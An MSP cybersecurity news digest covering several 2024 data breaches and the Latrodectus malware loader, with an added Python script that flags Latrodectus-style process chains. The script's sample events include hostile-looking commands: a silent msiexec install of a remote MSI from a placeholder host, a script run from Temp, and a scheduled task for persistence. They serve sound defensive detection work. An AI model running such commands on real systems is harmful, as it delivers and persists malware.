MSP cybersecurity news digest, May 31, 2024

Banco Santander warns of a data breach exposing customer info

Banco Santander S.A., with an annual revenue of €59.59 billion, announced a data breach affecting customers due to unauthorized access to a database hosted by a third-party provider. 

The breach impacted customers and employees in Spain, Chile and Uruguay, but did not affect transaction information or online banking credentials. The bank stated that immediate actions were taken to contain the breach, and additional fraud prevention measures were implemented.

The bank's systems in other regions remain unaffected, and services continue to operate normally. Banco Santander said it will notify affected individuals and law enforcement about the incident.

WebTPA data breach impacts over 2.4 million insurance policyholders

A WebTPA Employer Services (WebTPA) data breach disclosed earlier this month impacted close to 2.5 million individuals, according to the U.S. Department of Health and Human Services.

Some affected individuals are customers of major insurance companies like The Hartford, Transamerica and Gerber Life Insurance. WebTPA, a subsidiary of GuideWell Mutual Holding Corporation, discovered the breach in December, although it occurred in April 2023. 

The breach exposed personal data, including full names, contact information, birth dates and Social Security numbers. Financial account information and medical records were reportedly not compromised.

Latrodectus malware loader emerges as IcedID's successor in phishing campaigns

Researchers have observed a surge in email phishing campaigns since early March 2024, delivering Latrodectus, a new malware loader believed to be the successor to IcedID.

These campaigns typically use oversized JavaScript files to install a remotely hosted MSI file via msiexec.exe, invoked through WMI. Latrodectus deploys additional payloads like QakBot and DarkGate, with features for enumeration, execution and self-deletion. It masquerades as legitimate software, uses obfuscation, and performs anti-analysis checks to avoid detection. Latrodectus establishes persistence with a scheduled task and communicates with a C2 server over HTTPS, allowing it to collect system information and execute commands.

Researchers suggest Latrodectus may be developed as a replacement for IcedID, noting its ongoing enhancements and deployment in various phishing campaigns.
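The chain described above (a script host launching a JavaScript file from a user-writable folder, msiexec.exe fetching a remote MSI through WMI, and a scheduled task pointing back into AppData) leaves a distinctive trail in process-creation telemetry. The following is an added detection example, not code from the researchers or the article: it runs a few simple rules over constructed Sysmon-style process-creation records. All event values (paths, user name, URL host, task name) are invented for the example, and the rule names are arbitrary.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events, not real telemetry. The first three mimic the
# Latrodectus chain; the last two are benign look-alikes the rules should ignore.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice_4412.js"'),
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://cdn.example.invalid/pkg/update.msi /qn"),
    ProcEvent(r"C:\Users\alice\AppData\Roaming\update\client.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 10 /tn "Updater" /tr "C:\Users\alice\AppData\Roaming\update\client.exe"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\ProgramData\Vendor\app.msi" /qn'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\run.exe"'),
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories a standard user can write to; a persistence target or script living here is suspicious.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Users\\Public)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits: List[str] = []
    image = _basename(event.image)
    parent = _basename(event.parent_image)
    cmd = event.command_line

    # Stage 1: a script host executing a file dropped in a user-writable directory.
    if image in SCRIPT_HOSTS and USER_WRITABLE_RE.search(cmd):
        hits.append("script_host_from_user_writable")
    # Stage 2a: msiexec asked to install a package straight from a URL.
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_msi")
    # Stage 2b: the installer was launched through WMI (WmiPrvSE is the parent).
    if image == "msiexec.exe" and parent == "wmiprvse.exe":
        hits.append("msiexec_spawned_via_wmi")
    # Stage 3: scheduled task whose action lives in a user-writable directory.
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.IGNORECASE) \
            and USER_WRITABLE_RE.search(cmd):
        hits.append("schtasks_user_writable_target")
    return hits


def analyze(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Pair each flagged event's index with the rules it triggered."""
    return [(i, detect(e)) for i, e in enumerate(events) if detect(e)]


if __name__ == "__main__":
    for index, rules in analyze(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(rules)}")
```

Each rule on its own is noisy in a real estate (legitimate installers do fetch MSIs over HTTP, and some software schedules tasks under AppData), so the useful signal is several of these firing on the same host within minutes; correlating the hits per host rather than alerting on each one is the natural next step.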

American Radio Relay League cyberattack takes Logbook of The World offline

The American Radio Relay League (ARRL) announced a cyberattack disrupting its IT systems and online operations, including email and the Logbook of The World (LoTW).

As the national association for amateur radio in the U.S., ARRL represents amateur radio interests, provides technical advice and promotes events and educational programs. The attack affected several services, including LoTW and the ARRL Learning Center. 

ARRL assured members that no credit card information or Social Security numbers are stored, though private information like names, addresses and call signs is in its database. The nature of the cyberattack remains unclear.

Recent victims in Australia

Sumo Energy, an Australian electricity, gas and internet provider with over 31,000 electricity customers and about 8,300 retail gas customers, confirmed a data breach exposing customer credit scores, passports, driver’s licenses, and more via a third-party attack. 

The breach, involving a large volume of customer information and documents, was posted on a clear-web hacking forum. The hacker, known as “OriginalCrazyOldFart,” shared links to Amazon web buckets where the data was stored. The sample data includes a nearly 1 GB zip file of customer electricity invoices and a 160 MB zip file of gas invoices. Sumo stated that the breach affected a third-party file storage application, not its own systems, and that it has since secured the application. It is notifying affected customers and providing support through IDCARE and Equifax credit monitoring. Sumo has informed authorities and is investigating further, urging customers to monitor for signs of fraud and identity theft.

In a separate case, MediSecure in Australia shut down its website and phone lines following a ransomware attack believed to have stemmed from a third-party vendor. The breach has impacted personal and health information, though the extent is unclear. MediSecure, operating since 2009, provides digital tools for health care professionals to manage medications, and has issued millions of eScripts via private and state-backed systems. The company reported the breach to Australian regulators, including the Office of the Australian Information Commissioner. MediSecure is working with the National Cyber Security Coordinator to mitigate the impact and investigate the incident.